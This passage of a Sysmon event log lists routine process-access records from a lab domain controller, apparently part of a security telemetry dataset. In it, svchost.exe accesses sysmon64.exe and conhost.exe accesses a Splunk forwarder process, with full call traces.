05:55:50.944","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5990,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.944\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.944","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5991,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.944\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.944","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5992,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.944\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.944","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5993,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.944\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.944","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5994,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.944\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.944","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5995,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.944\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.944","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5996,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.944\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.944","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5997,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.944\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-03E6-5F25-0000-0010A90E0B00}\r\nTargetProcessId: 2460\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.944","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-03E6-5F25-0000-0010A90E0B00}","TargetProcessId":"2460","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
